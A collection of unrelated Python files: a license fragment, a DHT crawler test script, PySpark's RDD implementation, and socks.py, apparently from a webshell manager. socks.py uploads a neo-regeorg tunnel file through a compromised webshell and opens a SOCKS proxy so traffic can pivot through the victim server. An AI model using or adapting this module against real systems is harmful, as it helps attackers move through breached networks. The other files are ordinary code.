derivative work available to others as provided herein, then Licensee hereby
agrees to include in any such work a brief summary of the changes made to Python
3.5.2.
4. PSF is making Python 3.5.2 available to Licensee on an "AS IS" basis.
PSF MAKES NO REPRESENTATIONS OR WARRANTIES, EXPRESS OR IMPLIED. BY WAY OF
EXAMPLE, BUT NOT LIMITATION, PSF MAKES NO AND DISCLAIMS ANY REPRESENTATION OR
WARRANTY OF MERCHANTABILITY OR FITNESS FOR ANY PARTICULAR PURPOSE OR THAT THE
USE OF PYTHON 3.5.2 WILL NOT INFRINGE ANY THIRD PARTY RIGHTS.
5. PSF SHALL NOT BE LIABLE TO LICENSEE OR ANY OTHER USERS OF PYTHON 3.5.2
FOR ANY INCIDENTAL, SPECIAL, OR CONSEQUENTIAL DAMAGES OR LOSS AS A RESULT OF
MODIFYING, DISTRIBUTING, OR OTHERWISE USING PYTHON 3.5.2, OR ANY DERIVATIVE
THEREOF, EVEN IF ADVISED OF THE POSSIBILITY THEREOF.
6. This License Agreement will automatically terminate upon a material breach of
its terms and conditions.
7. Nothing in this License Agreement shall be deemed to create any relationship
of agency, partnership, or joint venture between PSF and Licensee. This License
Agreement does not grant permission to use PSF trademarks or trade name in a
trademark sense to endorse or promote products or services of Licensee, or any
third party.
8. By copying, installing or otherwise using Python 3.5.2, Licensee agrees
to be bound by the terms and conditions of this License Agreement.
"""
|
test.py
|
#!/usr/bin/python
# -*- coding: UTF-8 -*-
import logging
from multiprocessing import Process
from dht_tracker.web import web_start
from dht_tracker.dht import BaseDHT,KRPC,KTable,NormalDHT,DHTSpider
from dht_tracker.common import netcount,sync
logging.basicConfig(level=logging.DEBUG,
format='[%(asctime)s][%(filename)s][%(funcName)s]LINE %(lineno)-4d : %(levelname)-8s %(message)s'
)
dhtser = NormalDHT()
#----------------------------------------------------------------------
def collect_on_get_peers(info,addr):
"""重写收集到的get_peers信息的处理
这里仅打印,以示例
"""
print "get_peers",(info,addr)
#----------------------------------------------------------------------
def collect_on_announce_peer(info,addr):
"""重写收集到的announce_peer信息的处理
这里仅打印,以示例
"""
print "announce_peer",(info,addr)
#----------------------------------------------------------------------
def recv_find_node_node(task,node):
"""重写对find_node任务返回的node信息的处理
这里仅打印,以示例
"""
print "find_node_node",task.id,node
#----------------------------------------------------------------------
def recv_get_peers_values(task,values):
"""重写对get_peers任务返回的values信息的处理
这里仅打印,以示例
"""
print "get_peers_values",task.id,values
dhtser.on_get_peers_info = collect_on_get_peers
dhtser.on_announce_peer_info = collect_on_announce_peer
dhtser.on_find_node_node = recv_find_node_node
dhtser.on_get_peers_values = recv_get_peers_values
dhtser.taskline.push("get_peers",'\x04\x03\xfbG(\xbdx\x8f\xbc\xb6~\x87\xd6\xfe\xb2A\xef8\xc7Z')
dhtser.start_dht()
#try:
#p = Process(target=dhtser.start_dht, args=())
#q = Process(target=web_start, args=())
#p.start()
#q.start()
#p.join()
#q.join()
#except Exception, e:
#logging.warning(e)
|
socks.py
|
from os import path
from re import match
from threading import Thread
from libs.config import alias, gget, color
from libs.myapp import send, base64_encode, randstr, ALPATHNUMERIC
from auxiliary.neoreg.x import init, generate, connectTunnel
def default_input(msg, value):
result = input("%s [%s]: " % (msg, value))
return result if result else value
@alias(True, _type="OTHER", k="key", code="httpcode", dns="local_dns", t="threads", l="listen_on", p="listen_port")
def run(key: str = 'doughnuts', threads: int = 1000, listen_on: str = "127.0.0.1", listen_port: int = 1080, httpcode: int = 200, read_buff: int = 513, connect_read_buf: int = 7, max_read_size: int = 512, read_interval: int = 300, write_interval: int = 200, local_dns: bool = False):
"""
socks
    (DEVELOP) Start a socks server, upload and connect to the remote webshell tunnel for port mapping, powered by neo-regeorg.
eg: socks {key='doughnuts'} {threads=1000} {listen_on='127.0.0.1'} {listen_port=1080} {httpcode=200} {read_buff=513} {connect_read_buf=7} {max_read_size=512} {read_interval=300} {write_interval=200} {local_dns=False}
"""
name = randstr(ALPATHNUMERIC, 8) + ".php"
depr = gget("webshell.directory_separator", "webshell")
scheme = gget("webshell.scheme", "webshell")
netloc = gget("webshell.netloc", "webshell")
http_root_path = "%s://%s/" % (scheme, netloc)
web_root = gget("webshell.root", "webshell", "")
webshell_root = gget("webshell.webshell_root", "webshell", ".")
relpath = path.relpath(webshell_root + "/" + name, web_root)
tunnel_path = default_input("tunnel path", webshell_root + depr + name)
http_path = default_input("http path", http_root_path + relpath)
# init
init(key)
# generate
tunnel_content = generate(httpcode, read_buff, max_read_size)
res = send(
f"print(file_put_contents(base64_decode('{base64_encode(tunnel_path)}'), base64_decode('{base64_encode(tunnel_content)}')));")
if (not res):
return
text = res.r_text.strip()
if (match(r"\d+", text)):
print(color.green(f"\nWrite tunnel {tunnel_path} success"))
else:
print(color.red(f"\nWrite tunnel {tunnel_path} failed"))
return
# connect
t = Thread(target=connectTunnel, args=(http_path, listen_on, listen_port, local_dns, connect_read_buf, read_interval, write_interval, threads))
    t.daemon = True  # setDaemon() is deprecated; set the attribute directly
t.start()
print(color.green(f"\nStart socks server on {listen_on}:{listen_port} success\n"))
|
rdd.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from base64 import standard_b64encode as b64enc
import copy
from collections import defaultdict
from collections import namedtuple
from itertools import chain, ifilter, imap
import operator
import os
import sys
import shlex
import traceback
from subprocess import Popen, PIPE
from tempfile import NamedTemporaryFile
from threading import Thread
import warnings
import heapq
from random import Random
from math import sqrt, log
from pyspark.serializers import NoOpSerializer, CartesianDeserializer, \
BatchedSerializer, CloudPickleSerializer, PairDeserializer, \
PickleSerializer, pack_long
from pyspark.join import python_join, python_left_outer_join, \
python_right_outer_join, python_cogroup
from pyspark.statcounter import StatCounter
from pyspark.rddsampler import RDDSampler
from pyspark.storagelevel import StorageLevel
from pyspark.resultiterable import ResultIterable
from py4j.java_collections import ListConverter, MapConverter
__all__ = ["RDD"]
# TODO: for Python 3.3+, PYTHONHASHSEED should be reset to disable randomized
# hash for string
def portable_hash(x):
"""
    This function returns a consistent hash code for builtin types, especially
    for None and tuples containing None.
    The algorithm is similar to the one used by CPython 2.7.
>>> portable_hash(None)
0
>>> portable_hash((None, 1))
219750521
"""
if x is None:
return 0
if isinstance(x, tuple):
h = 0x345678
for i in x:
h ^= portable_hash(i)
h *= 1000003
h &= 0xffffffff
h ^= len(x)
if h == -1:
h = -2
return h
return hash(x)
def _extract_concise_traceback():
"""
    This function returns the traceback info for a callsite as a namedtuple
    with the function name, file name and line number.
"""
tb = traceback.extract_stack()
callsite = namedtuple("Callsite", "function file linenum")
if len(tb) == 0:
return None
file, line, module, what = tb[len(tb) - 1]
sparkpath = os.path.dirname(file)
first_spark_frame = len(tb) - 1
for i in range(0, len(tb)):
file, line, fun, what = tb[i]
if file.startswith(sparkpath):
first_spark_frame = i
break
if first_spark_frame == 0:
file, line, fun, what = tb[0]
return callsite(function=fun, file=file, linenum=line)
sfile, sline, sfun, swhat = tb[first_spark_frame]
ufile, uline, ufun, uwhat = tb[first_spark_frame - 1]
return callsite(function=sfun, file=ufile, linenum=uline)
_spark_stack_depth = 0
class _JavaStackTrace(object):
def __init__(self, sc):
tb = _extract_concise_traceback()
if tb is not None:
self._traceback = "%s at %s:%s" % (
tb.function, tb.file, tb.linenum)
else:
self._traceback = "Error! Could not extract traceback info"
self._context = sc
def __enter__(self):
global _spark_stack_depth
if _spark_stack_depth == 0:
self._context._jsc.setCallSite(self._traceback)
_spark_stack_depth += 1
def __exit__(self, type, value, tb):
global _spark_stack_depth
_spark_stack_depth -= 1
if _spark_stack_depth == 0:
self._context._jsc.setCallSite(None)
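# --- Generic, self-contained sketch of the depth-counted guard pattern used ---
# --- by _JavaStackTrace above: only the outermost `with` block sets the     ---
# --- shared state and only the final exit clears it, so nested uses are     ---
# --- no-ops. (Hypothetical illustration; no SparkContext involved.)         ---
class _DepthCountedGuard(object):
    depth = 0
    callsite = None

    def __init__(self, label):
        self.label = label

    def __enter__(self):
        cls = _DepthCountedGuard
        if cls.depth == 0:
            cls.callsite = self.label      # set once, by the outermost entry
        cls.depth += 1

    def __exit__(self, type, value, tb):
        cls = _DepthCountedGuard
        cls.depth -= 1
        if cls.depth == 0:
            cls.callsite = None            # cleared when fully unwound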
class MaxHeapQ(object):
"""
An implementation of MaxHeap.
>>> import pyspark.rdd
>>> heap = pyspark.rdd.MaxHeapQ(5)
>>> [heap.insert(i) for i in range(10)]
[None, None, None, None, None, None, None, None, None, None]
>>> sorted(heap.getElements())
[0, 1, 2, 3, 4]
>>> heap = pyspark.rdd.MaxHeapQ(5)
>>> [heap.insert(i) for i in range(9, -1, -1)]
[None, None, None, None, None, None, None, None, None, None]
>>> sorted(heap.getElements())
[0, 1, 2, 3, 4]
>>> heap = pyspark.rdd.MaxHeapQ(1)
>>> [heap.insert(i) for i in range(9, -1, -1)]
[None, None, None, None, None, None, None, None, None, None]
>>> heap.getElements()
[0]
"""
def __init__(self, maxsize):
# We start from q[1], so its children are always 2 * k
self.q = [0]
self.maxsize = maxsize
def _swim(self, k):
while (k > 1) and (self.q[k / 2] < self.q[k]):
self._swap(k, k / 2)
k = k / 2
def _swap(self, i, j):
t = self.q[i]
self.q[i] = self.q[j]
self.q[j] = t
def _sink(self, k):
N = self.size()
while 2 * k <= N:
j = 2 * k
# Here we test if both children are greater than parent
# if not swap with larger one.
if j < N and self.q[j] < self.q[j + 1]:
j = j + 1
if(self.q[k] > self.q[j]):
break
self._swap(k, j)
k = j
def size(self):
return len(self.q) - 1
def insert(self, value):
if (self.size()) < self.maxsize:
self.q.append(value)
self._swim(self.size())
else:
self._replaceRoot(value)
def getElements(self):
return self.q[1:]
def _replaceRoot(self, value):
if(self.q[1] > value):
self.q[1] = value
self._sink(1)
class RDD(object):
"""
A Resilient Distributed Dataset (RDD), the basic abstraction in Spark.
Represents an immutable, partitioned collection of elements that can be
operated on in parallel.
"""
def __init__(self, jrdd, ctx, jrdd_deserializer):
self._jrdd = jrdd
self.is_cached = False
self.is_checkpointed = False
self.ctx = ctx
self._jrdd_deserializer = jrdd_deserializer
self._id = jrdd.id()
def id(self):
"""
A unique ID for this RDD (within its SparkContext).
"""
return self._id
def __repr__(self):
return self._jrdd.toString()
@property
def context(self):
"""
The L{SparkContext} that this RDD was created on.
"""
return self.ctx
def cache(self):
"""
Persist this RDD with the default storage level (C{MEMORY_ONLY_SER}).
"""
self.is_cached = True
self.persist(StorageLevel.MEMORY_ONLY_SER)
return self
def persist(self, storageLevel):
"""
Set this RDD's storage level to persist its values across operations
after the first time it is computed. This can only be used to assign
a new storage level if the RDD does not have a storage level set yet.
"""
self.is_cached = True
javaStorageLevel = self.ctx._getJavaStorageLevel(storageLevel)
self._jrdd.persist(javaStorageLevel)
return self
def unpersist(self):
"""
Mark the RDD as non-persistent, and remove all blocks for it from
memory and disk.
"""
self.is_cached = False
self._jrdd.unpersist()
return self
def checkpoint(self):
"""
Mark this RDD for checkpointing. It will be saved to a file inside the
checkpoint directory set with L{SparkContext.setCheckpointDir()} and
all references to its parent RDDs will be removed. This function must
be called before any job has been executed on this RDD. It is strongly
recommended that this RDD is persisted in memory, otherwise saving it
on a file will require recomputation.
"""
self.is_checkpointed = True
self._jrdd.rdd().checkpoint()
def isCheckpointed(self):
"""
Return whether this RDD has been checkpointed or not
"""
return self._jrdd.rdd().isCheckpointed()
def getCheckpointFile(self):
"""
Gets the name of the file to which this RDD was checkpointed
"""
checkpointFile = self._jrdd.rdd().getCheckpointFile()
if checkpointFile.isDefined():
return checkpointFile.get()
else:
return None
def map(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each element of this RDD.
>>> rdd = sc.parallelize(["b", "a", "c"])
>>> sorted(rdd.map(lambda x: (x, 1)).collect())
[('a', 1), ('b', 1), ('c', 1)]
"""
def func(split, iterator):
return imap(f, iterator)
return PipelinedRDD(self, func, preservesPartitioning)
def flatMap(self, f, preservesPartitioning=False):
"""
Return a new RDD by first applying a function to all elements of this
RDD, and then flattening the results.
>>> rdd = sc.parallelize([2, 3, 4])
>>> sorted(rdd.flatMap(lambda x: range(1, x)).collect())
[1, 1, 1, 2, 2, 3]
>>> sorted(rdd.flatMap(lambda x: [(x, x), (x, x)]).collect())
[(2, 2), (2, 2), (3, 3), (3, 3), (4, 4), (4, 4)]
"""
def func(s, iterator):
return chain.from_iterable(imap(f, iterator))
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def mapPartitions(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each partition of this RDD.
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> def f(iterator): yield sum(iterator)
>>> rdd.mapPartitions(f).collect()
[3, 7]
"""
def func(s, iterator):
return f(iterator)
return self.mapPartitionsWithIndex(func)
def mapPartitionsWithIndex(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each partition of this RDD,
while tracking the index of the original partition.
>>> rdd = sc.parallelize([1, 2, 3, 4], 4)
>>> def f(splitIndex, iterator): yield splitIndex
>>> rdd.mapPartitionsWithIndex(f).sum()
6
"""
return PipelinedRDD(self, f, preservesPartitioning)
def mapPartitionsWithSplit(self, f, preservesPartitioning=False):
"""
Deprecated: use mapPartitionsWithIndex instead.
Return a new RDD by applying a function to each partition of this RDD,
while tracking the index of the original partition.
>>> rdd = sc.parallelize([1, 2, 3, 4], 4)
>>> def f(splitIndex, iterator): yield splitIndex
>>> rdd.mapPartitionsWithSplit(f).sum()
6
"""
warnings.warn("mapPartitionsWithSplit is deprecated; "
"use mapPartitionsWithIndex instead", DeprecationWarning, stacklevel=2)
return self.mapPartitionsWithIndex(f, preservesPartitioning)
def getNumPartitions(self):
"""
Returns the number of partitions in this RDD
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> rdd.getNumPartitions()
2
"""
return self._jrdd.partitions().size()
def filter(self, f):
"""
Return a new RDD containing only the elements that satisfy a predicate.
>>> rdd = sc.parallelize([1, 2, 3, 4, 5])
>>> rdd.filter(lambda x: x % 2 == 0).collect()
[2, 4]
"""
def func(iterator):
return ifilter(f, iterator)
return self.mapPartitions(func)
def distinct(self):
"""
Return a new RDD containing the distinct elements in this RDD.
>>> sorted(sc.parallelize([1, 1, 2, 3]).distinct().collect())
[1, 2, 3]
"""
return self.map(lambda x: (x, None)) \
.reduceByKey(lambda x, _: x) \
.map(lambda (x, _): x)
def sample(self, withReplacement, fraction, seed=None):
"""
Return a sampled subset of this RDD (relies on numpy and falls back
on default random generator if numpy is unavailable).
>>> sc.parallelize(range(0, 100)).sample(False, 0.1, 2).collect() #doctest: +SKIP
[2, 3, 20, 21, 24, 41, 42, 66, 67, 89, 90, 98]
"""
assert fraction >= 0.0, "Invalid fraction value: %s" % fraction
return self.mapPartitionsWithIndex(RDDSampler(withReplacement, fraction, seed).func, True)
# this is ported from scala/spark/RDD.scala
def takeSample(self, withReplacement, num, seed=None):
"""
Return a fixed-size sampled subset of this RDD (currently requires
numpy).
>>> rdd = sc.parallelize(range(0, 10))
>>> len(rdd.takeSample(True, 20, 1))
20
>>> len(rdd.takeSample(False, 5, 2))
5
>>> len(rdd.takeSample(False, 15, 3))
10
"""
numStDev = 10.0
if num < 0:
raise ValueError("Sample size cannot be negative.")
elif num == 0:
return []
initialCount = self.count()
if initialCount == 0:
return []
rand = Random(seed)
if (not withReplacement) and num >= initialCount:
# shuffle current RDD and return
samples = self.collect()
rand.shuffle(samples)
return samples
maxSampleSize = sys.maxint - int(numStDev * sqrt(sys.maxint))
if num > maxSampleSize:
raise ValueError(
"Sample size cannot be greater than %d." % maxSampleSize)
fraction = RDD._computeFractionForSampleSize(
num, initialCount, withReplacement)
samples = self.sample(withReplacement, fraction, seed).collect()
# If the first sample didn't turn out large enough, keep trying to take samples;
# this shouldn't happen often because we use a big multiplier for their initial size.
# See: scala/spark/RDD.scala
while len(samples) < num:
# TODO: add log warning for when more than one iteration was run
seed = rand.randint(0, sys.maxint)
samples = self.sample(withReplacement, fraction, seed).collect()
rand.shuffle(samples)
return samples[0:num]
@staticmethod
def _computeFractionForSampleSize(sampleSizeLowerBound, total, withReplacement):
"""
Returns a sampling rate that guarantees a sample of
size >= sampleSizeLowerBound 99.99% of the time.
How the sampling rate is determined:
Let p = num / total, where num is the sample size and total is the
total number of data points in the RDD. We're trying to compute
q > p such that
- when sampling with replacement, we're drawing each data point
with prob_i ~ Pois(q), where we want to guarantee
Pr[s < num] < 0.0001 for s = sum(prob_i for i from 0 to
total), i.e. the failure rate of not having a sufficiently large
sample < 0.0001. Setting q = p + 5 * sqrt(p/total) is sufficient
to guarantee 0.9999 success rate for num > 12, but we need a
slightly larger q (9 empirically determined).
- when sampling without replacement, we're drawing each data point
with prob_i ~ Binomial(total, fraction) and our choice of q
guarantees 1-delta, or 0.9999 success rate, where success rate is
defined the same as in sampling with replacement.
"""
fraction = float(sampleSizeLowerBound) / total
if withReplacement:
numStDev = 5
if (sampleSizeLowerBound < 12):
numStDev = 9
return fraction + numStDev * sqrt(fraction / total)
else:
delta = 0.00005
gamma = - log(delta) / total
return min(1, fraction + gamma + sqrt(gamma * gamma + 2 * gamma * fraction))
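# Worked example of the formulas above (illustrative only). With num = 100
# and total = 10000 the base rate is p = num / total = 0.01:
#   with replacement (num > 12, so numStDev = 5):
#       q = 0.01 + 5 * sqrt(0.01 / 10000) = 0.01 + 5 * 0.001 = 0.015
#   without replacement (delta = 0.00005):
#       gamma = -log(0.00005) / 10000 ~= 0.00099
#       q = 0.01 + 0.00099 + sqrt(0.00099**2 + 2 * 0.00099 * 0.01) ~= 0.0155
# Both rates sit comfortably above p, which is what makes a too-small sample
# (and hence a retry in takeSample) unlikely.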
def union(self, other):
"""
Return the union of this RDD and another one.
>>> rdd = sc.parallelize([1, 1, 2, 3])
>>> rdd.union(rdd).collect()
[1, 1, 2, 3, 1, 1, 2, 3]
"""
if self._jrdd_deserializer == other._jrdd_deserializer:
rdd = RDD(self._jrdd.union(other._jrdd), self.ctx,
self._jrdd_deserializer)
return rdd
else:
# These RDDs contain data in different serialized formats, so we
# must normalize them to the default serializer.
self_copy = self._reserialize()
other_copy = other._reserialize()
return RDD(self_copy._jrdd.union(other_copy._jrdd), self.ctx,
self.ctx.serializer)
def intersection(self, other):
"""
Return the intersection of this RDD and another one. The output will
not contain any duplicate elements, even if the input RDDs did.
Note that this method performs a shuffle internally.
>>> rdd1 = sc.parallelize([1, 10, 2, 3, 4, 5])
>>> rdd2 = sc.parallelize([1, 6, 2, 3, 7, 8])
>>> rdd1.intersection(rdd2).collect()
[1, 2, 3]
"""
return self.map(lambda v: (v, None)) \
.cogroup(other.map(lambda v: (v, None))) \
.filter(lambda x: (len(x[1][0]) != 0) and (len(x[1][1]) != 0)) \
.keys()
def _reserialize(self, serializer=None):
serializer = serializer or self.ctx.serializer
if self._jrdd_deserializer == serializer:
return self
else:
converted = self.map(lambda x: x, preservesPartitioning=True)
converted._jrdd_deserializer = serializer
return converted
def __add__(self, other):
"""
Return the union of this RDD and another one.
>>> rdd = sc.parallelize([1, 1, 2, 3])
>>> (rdd + rdd).collect()
[1, 1, 2, 3, 1, 1, 2, 3]
"""
if not isinstance(other, RDD):
raise TypeError
return self.union(other)
def sortByKey(self, ascending=True, numPartitions=None, keyfunc=lambda x: x):
"""
Sorts this RDD, which is assumed to consist of (key, value) pairs.
# noqa
>>> tmp = [('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
>>> sc.parallelize(tmp).sortByKey(True, 2).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> tmp2 = [('Mary', 1), ('had', 2), ('a', 3), ('little', 4), ('lamb', 5)]
>>> tmp2.extend([('whose', 6), ('fleece', 7), ('was', 8), ('white', 9)])
>>> sc.parallelize(tmp2).sortByKey(True, 3, keyfunc=lambda k: k.lower()).collect()
[('a', 3), ('fleece', 7), ('had', 2), ('lamb', 5),...('white', 9), ('whose', 6)]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
bounds = list()
# first compute the boundary of each part via sampling: we want to partition
# the key-space into bins such that the bins have roughly the same
# number of (key, value) pairs falling into them
if numPartitions > 1:
rddSize = self.count()
# constant from Spark's RangePartitioner
maxSampleSize = numPartitions * 20.0
fraction = min(maxSampleSize / max(rddSize, 1), 1.0)
samples = self.sample(False, fraction, 1).map(
lambda (k, v): k).collect()
samples = sorted(samples, reverse=(not ascending), key=keyfunc)
# we have numPartitions many parts but one of them has
# an implicit boundary
for i in range(0, numPartitions - 1):
index = (len(samples) - 1) * (i + 1) / numPartitions
bounds.append(samples[index])
def rangePartitionFunc(k):
p = 0
while p < len(bounds) and keyfunc(k) > bounds[p]:
p += 1
if ascending:
return p
else:
return numPartitions - 1 - p
def mapFunc(iterator):
yield sorted(iterator, reverse=(not ascending), key=lambda (k, v): keyfunc(k))
return (self.partitionBy(numPartitions, partitionFunc=rangePartitionFunc)
.mapPartitions(mapFunc, preservesPartitioning=True)
.flatMap(lambda x: x, preservesPartitioning=True))
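# A standalone sketch (illustrative only) of the boundary computation used
# by sortByKey above: given a sorted sample of keys, pick numPartitions - 1
# evenly spaced boundary keys so that each range partition receives a
# roughly equal share of the sampled key space.
def _range_bounds_sketch(sorted_samples, numPartitions):
    bounds = []
    for i in range(0, numPartitions - 1):
        index = (len(sorted_samples) - 1) * (i + 1) // numPartitions
        bounds.append(sorted_samples[index])
    return bounds
# Example: _range_bounds_sketch(list(range(100)), 4) returns [24, 49, 74],
# i.e. three boundaries splitting the sampled keys into four ranges.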
def sortBy(self, keyfunc, ascending=True, numPartitions=None):
"""
Sorts this RDD by the given keyfunc
>>> tmp = [('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
>>> sc.parallelize(tmp).sortBy(lambda x: x[0]).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> sc.parallelize(tmp).sortBy(lambda x: x[1]).collect()
[('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
"""
return self.keyBy(keyfunc).sortByKey(ascending, numPartitions).values()
def glom(self):
"""
Return an RDD created by coalescing all elements within each partition
into a list.
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> sorted(rdd.glom().collect())
[[1, 2], [3, 4]]
"""
def func(iterator):
yield list(iterator)
return self.mapPartitions(func)
def cartesian(self, other):
"""
Return the Cartesian product of this RDD and another one, that is, the
RDD of all pairs of elements C{(a, b)} where C{a} is in C{self} and
C{b} is in C{other}.
>>> rdd = sc.parallelize([1, 2])
>>> sorted(rdd.cartesian(rdd).collect())
[(1, 1), (1, 2), (2, 1), (2, 2)]
"""
# Due to batching, we can't use the Java cartesian method.
deserializer = CartesianDeserializer(self._jrdd_deserializer,
other._jrdd_deserializer)
return RDD(self._jrdd.cartesian(other._jrdd), self.ctx, deserializer)
def groupBy(self, f, numPartitions=None):
"""
Return an RDD of grouped items.
>>> rdd = sc.parallelize([1, 1, 2, 3, 5, 8])
>>> result = rdd.groupBy(lambda x: x % 2).collect()
>>> sorted([(x, sorted(y)) for (x, y) in result])
[(0, [2, 8]), (1, [1, 1, 3, 5])]
"""
return self.map(lambda x: (f(x), x)).groupByKey(numPartitions)
def pipe(self, command, env={}):
"""
Return an RDD created by piping elements to a forked external process.
>>> sc.parallelize(['1', '2', '', '3']).pipe('cat').collect()
['1', '2', '', '3']
"""
def func(iterator):
pipe = Popen(
shlex.split(command), env=env, stdin=PIPE, stdout=PIPE)
def pipe_objs(out):
for obj in iterator:
out.write(str(obj).rstrip('\n') + '\n')
out.close()
Thread(target=pipe_objs, args=[pipe.stdin]).start()
return (x.rstrip('\n') for x in iter(pipe.stdout.readline, ''))
return self.mapPartitions(func)
def foreach(self, f):
"""
Applies a function to all elements of this RDD.
>>> def f(x): print x
>>> sc.parallelize([1, 2, 3, 4, 5]).foreach(f)
"""
def processPartition(iterator):
for x in iterator:
f(x)
yield None
self.mapPartitions(processPartition).collect() # Force evaluation
def foreachPartition(self, f):
"""
Applies a function to each partition of this RDD.
>>> def f(iterator):
... for x in iterator:
... print x
... yield None
>>> sc.parallelize([1, 2, 3, 4, 5]).foreachPartition(f)
"""
self.mapPartitions(f).collect() # Force evaluation
def collect(self):
"""
Return a list that contains all of the elements in this RDD.
"""
with _JavaStackTrace(self.context) as st:
bytesInJava = self._jrdd.collect().iterator()
return list(self._collect_iterator_through_file(bytesInJava))
def _collect_iterator_through_file(self, iterator):
# Transferring lots of data through Py4J can be slow because
# socket.readline() is inefficient. Instead, we'll dump the data to a
# file and read it back.
tempFile = NamedTemporaryFile(delete=False, dir=self.ctx._temp_dir)
tempFile.close()
self.ctx._writeToFile(iterator, tempFile.name)
# Read the data into Python and deserialize it:
with open(tempFile.name, 'rb') as tempFile:
for item in self._jrdd_deserializer.load_stream(tempFile):
yield item
os.unlink(tempFile.name)
def reduce(self, f):
"""
Reduces the elements of this RDD using the specified commutative and
associative binary operator. Currently reduces partitions locally.
>>> from operator import add
>>> sc.parallelize([1, 2, 3, 4, 5]).reduce(add)
15
>>> sc.parallelize((2 for _ in range(10))).map(lambda x: 1).cache().reduce(add)
10
"""
def func(iterator):
acc = None
for obj in iterator:
if acc is None:
acc = obj
else:
acc = f(obj, acc)
if acc is not None:
yield acc
vals = self.mapPartitions(func).collect()
return reduce(f, vals)
def fold(self, zeroValue, op):
"""
Aggregate the elements of each partition, and then the results for all
the partitions, using a given associative function and a neutral "zero
value."
The function C{op(t1, t2)} is allowed to modify C{t1} and return it
as its result value to avoid object allocation; however, it should not
modify C{t2}.
>>> from operator import add
>>> sc.parallelize([1, 2, 3, 4, 5]).fold(0, add)
15
"""
def func(iterator):
acc = zeroValue
for obj in iterator:
acc = op(obj, acc)
yield acc
vals = self.mapPartitions(func).collect()
return reduce(op, vals, zeroValue)
def aggregate(self, zeroValue, seqOp, combOp):
"""
Aggregate the elements of each partition, and then the results for all
the partitions, using the given combine functions and a neutral "zero
value."
The functions C{op(t1, t2)} are allowed to modify C{t1} and return it
as their result value to avoid object allocation; however, they should not
modify C{t2}.
The first function (seqOp) can return a different result type, U, than
the type of this RDD. Thus, we need one operation for merging a T into
a U and one operation for merging two U's.
>>> seqOp = (lambda x, y: (x[0] + y, x[1] + 1))
>>> combOp = (lambda x, y: (x[0] + y[0], x[1] + y[1]))
>>> sc.parallelize([1, 2, 3, 4]).aggregate((0, 0), seqOp, combOp)
(10, 4)
>>> sc.parallelize([]).aggregate((0, 0), seqOp, combOp)
(0, 0)
"""
def func(iterator):
acc = zeroValue
for obj in iterator:
acc = seqOp(acc, obj)
yield acc
return self.mapPartitions(func).fold(zeroValue, combOp)
def max(self):
"""
Find the maximum item in this RDD.
>>> sc.parallelize([1.0, 5.0, 43.0, 10.0]).max()
43.0
"""
return self.reduce(max)
def min(self):
"""
Find the minimum item in this RDD.
>>> sc.parallelize([1.0, 5.0, 43.0, 10.0]).min()
1.0
"""
return self.reduce(min)
def sum(self):
"""
Add up the elements in this RDD.
>>> sc.parallelize([1.0, 2.0, 3.0]).sum()
6.0
"""
return self.mapPartitions(lambda x: [sum(x)]).reduce(operator.add)
def count(self):
"""
Return the number of elements in this RDD.
>>> sc.parallelize([2, 3, 4]).count()
3
"""
return self.mapPartitions(lambda i: [sum(1 for _ in i)]).sum()
def stats(self):
"""
Return a L{StatCounter} object that captures the mean, variance
and count of the RDD's elements in one operation.
"""
def redFunc(left_counter, right_counter):
return left_counter.mergeStats(right_counter)
return self.mapPartitions(lambda i: [StatCounter(i)]).reduce(redFunc)
def mean(self):
"""
Compute the mean of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).mean()
2.0
"""
return self.stats().mean()
def variance(self):
"""
Compute the variance of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).variance()
0.666...
"""
return self.stats().variance()
def stdev(self):
"""
Compute the standard deviation of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).stdev()
0.816...
"""
return self.stats().stdev()
def sampleStdev(self):
"""
Compute the sample standard deviation of this RDD's elements (which
corrects for bias in estimating the standard deviation by dividing by
N-1 instead of N).
>>> sc.parallelize([1, 2, 3]).sampleStdev()
1.0
"""
return self.stats().sampleStdev()
def sampleVariance(self):
"""
Compute the sample variance of this RDD's elements (which corrects
for bias in estimating the variance by dividing by N-1 instead of N).
>>> sc.parallelize([1, 2, 3]).sampleVariance()
1.0
"""
return self.stats().sampleVariance()
def countByValue(self):
"""
Return the count of each unique value in this RDD as a dictionary of
(value, count) pairs.
>>> sorted(sc.parallelize([1, 2, 1, 2, 2], 2).countByValue().items())
[(1, 2), (2, 3)]
"""
def countPartition(iterator):
counts = defaultdict(int)
for obj in iterator:
counts[obj] += 1
yield counts
def mergeMaps(m1, m2):
for (k, v) in m2.iteritems():
m1[k] += v
return m1
return self.mapPartitions(countPartition).reduce(mergeMaps)
def top(self, num):
"""
Get the top N elements from an RDD.
Note: It returns the list sorted in descending order.
>>> sc.parallelize([10, 4, 2, 12, 3]).top(1)
[12]
>>> sc.parallelize([2, 3, 4, 5, 6], 2).top(2)
[6, 5]
"""
def topIterator(iterator):
q = []
for k in iterator:
if len(q) < num:
heapq.heappush(q, k)
else:
heapq.heappushpop(q, k)
yield q
def merge(a, b):
return next(topIterator(a + b))
return sorted(self.mapPartitions(topIterator).reduce(merge), reverse=True)
def takeOrdered(self, num, key=None):
"""
